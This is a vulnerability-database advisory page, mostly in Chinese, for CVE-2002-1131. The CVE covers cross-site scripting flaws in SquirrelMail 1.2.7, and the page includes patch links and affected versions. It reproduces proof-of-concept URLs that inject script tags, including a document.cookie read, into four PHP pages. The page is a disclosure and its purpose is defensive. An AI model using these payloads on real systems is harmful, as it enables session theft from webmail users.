CVE-2002-1131
CVSS7.5
发布时间 :2002-10-04 00:00:00
修订时间 :2008-09-05 16:29:52
NMCOES    

[原文]Cross-site scripting vulnerabilities in SquirrelMail 1.2.7 and earlier allows remote attackers to execute script as other web users via (1) addressbook.php, (2) options.php, (3) search.php, or (4) help.php.


[CNNVD]SquirrelMail多个脚本跨站脚本执行漏洞(CNNVD-200210-078)

        
        SquirrelMail是一款PHP编写的WEBMAIL程序。
        SquirrelMail中多个脚本对用户提供的参数缺少正确过滤,远程攻击者可以利用这些漏洞进行跨站脚本执行攻击。
        SquirrelMail中的addressbook.php、options.php、search.php、help.php脚本对用户提交的HTML或者JAVASCRIPT代码缺少过滤,远程攻击者可以构建包含恶意脚本代码的页面,并诱使用户点击访问,脚本代码就会在目标用户的浏览器上执行,造成基于Cookie认证的信息泄露。
        <*链接:https://www.redhat.com/support/errata/RHSA-2002-204.html
        *>

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1131
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-1131
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200210-078
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/5763
(VENDOR_ADVISORY)  BID  5763
http://www.redhat.com/support/errata/RHSA-2002-204.html
(VENDOR_ADVISORY)  REDHAT  RHSA-2002:204
http://www.iss.net/security_center/static/10145.php
(VENDOR_ADVISORY)  XF  squirrelmail-php-xss(10145)
http://www.debian.org/security/2002/dsa-191
(UNKNOWN)  DEBIAN  DSA-191
http://archives.neohapsis.com/archives/bugtraq/2002-09/0246.html
(VENDOR_ADVISORY)  BUGTRAQ  20020919 Squirrel Mail 1.2.7 XSS Exploit
http://sourceforge.net/project/shownotes.php?group_id=311&release_id=110774
(UNKNOWN)  CONFIRM  http://sourceforge.net/project/shownotes.php?group_id=311&release_id=110774

- 漏洞信息

SquirrelMail多个脚本跨站脚本执行漏洞
高危 输入验证
2002-10-04 00:00:00 2005-10-20 00:00:00
远程  
        
        SquirrelMail是一款PHP编写的WEBMAIL程序。
        SquirrelMail中多个脚本对用户提供的参数缺少正确过滤,远程攻击者可以利用这些漏洞进行跨站脚本执行攻击。
        SquirrelMail中的addressbook.php、options.php、search.php、help.php脚本对用户提交的HTML或者JAVASCRIPT代码缺少过滤,远程攻击者可以构建包含恶意脚本代码的页面,并诱使用户点击访问,脚本代码就会在目标用户的浏览器上执行,造成基于Cookie认证的信息泄露。
        <*链接:https://www.redhat.com/support/errata/RHSA-2002-204.html
        *>

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * 浏览SquirrelMail时暂时关闭浏览器的JavaScript功能。
        厂商补丁:
        RedHat
        ------
        RedHat已经为此发布了一个安全公告(RHSA-2002:204-10)以及相应补丁:
        RHSA-2002:204-10:Updated squirrelmail packages close cross-site scripting vulnerabilities
        链接:https://www.redhat.com/support/errata/RHSA-2002-204.html
        补丁下载:
        Red Hat Linux 8.0:
        SRPMS:
        ftp://updates.redhat.com/8.0/en/os/SRPMS/squirrelmail-1.2.8-1.src.rpm
        noarch:
        ftp://updates.redhat.com/8.0/en/os/noarch/squirrelmail-1.2.8-1.noarch.rpm
        可使用下列命令安装补丁:
        rpm -Fvh [文件名]

- 漏洞信息 (21811)

SquirrelMail 1.2.6/1.2.7 Multiple Cross Site Scripting Vulnerablities (EDBID:21811)
php webapps
2002-09-19 Verified
0 DarC KonQuest
N/A [点击下载]
source: http://www.securityfocus.com/bid/5763/info

SquirrelMail is a feature rich webmail program implemented in the PHP4 language. It is available for Linux and Unix based operating systems.

Multiple cross site scripting vulnerabilities have been discovered in various PHP scripts included with SquirrelMail. By including embedded commands into a malicious link, it is possible for an attacker to execute HTML and script code on a web client in the context of the site hosting the webmail system.

This issue was reported for SquirrelMail 1.2.7, earlier versions may also be affected. 


http://<VULNERABLE
SITE>.net/webmail/src/addressbook.php?"><script>alert(document.cookie)</scri
pt><!--

http://<VULNERABLE
SITE>.net/webmail/src/options.php?optpage=<script>alert('boop!')</script>

http://<VULNERABLE
SITE>.net/webmail/src/search.php?mailbox=<script>alert('boop!')</script>&wha
t=x&where=BODY&submit=Search

http://<VULNERABLE
SITE>.net/webmail/src/search.php?mailbox=INBOX&what=x&where=<script>alert('b
oop!')</script>&submit=Search

http://<VULNERABLE
SITE>.net/webmail/src/help.php?chapter=<script>alert('boop!')</script> 		

- 漏洞信息

4262
SquirrelMail addressbook.php Multiple Parameter XSS
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

Squirrel Mail contains a flaw that allows a remote cross site scripting attack. This flaw exists because the application does not validate many variables upon submission to the addressbook.php script. This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

- 时间线

2002-09-19 2002-08-04
2002-09-19 Unknow

- 解决方案

Upgrade to version 1.2.8 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

- 漏洞信息

SquirrelMail Multiple Cross Site Scripting Vulnerablities
Input Validation Error 5763
Yes No
2002-09-19 12:00:00 2009-07-11 05:06:00
Discovery credited to DarC KonQuest.

- 受影响的程序版本

SquirrelMail SquirrelMail 1.2.7
+ RedHat Linux 8.0
SquirrelMail SquirrelMail 1.2.6
+ Debian Linux 3.0 sparc
+ Debian Linux 3.0 s/390
+ Debian Linux 3.0 s/390
+ Debian Linux 3.0 ppc
+ Debian Linux 3.0 ppc
+ Debian Linux 3.0 mipsel
+ Debian Linux 3.0 mipsel
+ Debian Linux 3.0 mips
+ Debian Linux 3.0 mips
+ Debian Linux 3.0 m68k
+ Debian Linux 3.0 m68k
+ Debian Linux 3.0 ia-64
+ Debian Linux 3.0 ia-64
+ Debian Linux 3.0 ia-32
+ Debian Linux 3.0 ia-32
+ Debian Linux 3.0 hppa
+ Debian Linux 3.0 hppa
+ Debian Linux 3.0 arm
+ Debian Linux 3.0 arm
+ Debian Linux 3.0 alpha
+ Debian Linux 3.0 alpha
+ Debian Linux 3.0
+ Debian Linux 3.0
SquirrelMail SquirrelMail 1.2.8
+ Terra Soft Solutions Yellow Dog Linux 3.0

- 不受影响的程序版本

SquirrelMail SquirrelMail 1.2.8
+ Terra Soft Solutions Yellow Dog Linux 3.0

- 漏洞讨论

SquirrelMail is a feature rich webmail program implemented in the PHP4 language. It is available for Linux and Unix based operating systems.

Multiple cross site scripting vulnerabilities have been discovered in various PHP scripts included with SquirrelMail. By including embedded commands into a malicious link, it is possible for an attacker to execute HTML and script code on a web client in the context of the site hosting the webmail system.

This issue was reported for SquirrelMail 1.2.7, earlier versions may also be affected.

- 漏洞利用

The following proof of concepts have been provided by DarC KonQuesT:

http://&lt;VULNERABLE
SITE&gt;.net/webmail/src/addressbook.php?"&gt;&lt;script&gt;alert(document.cookie)&lt;/scri
pt&gt;&lt;!--

http://&lt;VULNERABLE
SITE&gt;.net/webmail/src/options.php?optpage=&lt;script&gt;alert('boop!')&lt;/script&gt;

http://&lt;VULNERABLE
SITE&gt;.net/webmail/src/search.php?mailbox=&lt;script&gt;alert('boop!')&lt;/script&gt;&amp;wha
t=x&amp;where=BODY&amp;submit=Search

http://&lt;VULNERABLE
SITE&gt;.net/webmail/src/search.php?mailbox=INBOX&amp;what=x&amp;where=&lt;script&gt;alert('b
oop!')&lt;/script&gt;&amp;submit=Search

http://&lt;VULNERABLE
SITE&gt;.net/webmail/src/help.php?chapter=&lt;script&gt;alert('boop!')&lt;/script&gt;

- 解决方案

Debian has released a security advisory containing fixes.

The vendor has addressed the issue in SquirrelMail v1.2.8. Users are advised to upgrade.


SquirrelMail SquirrelMail 1.2.6

SquirrelMail SquirrelMail 1.2.7

- 相关参考

     

     

    关于SCAP中文社区

    SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

    版权声明

    CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站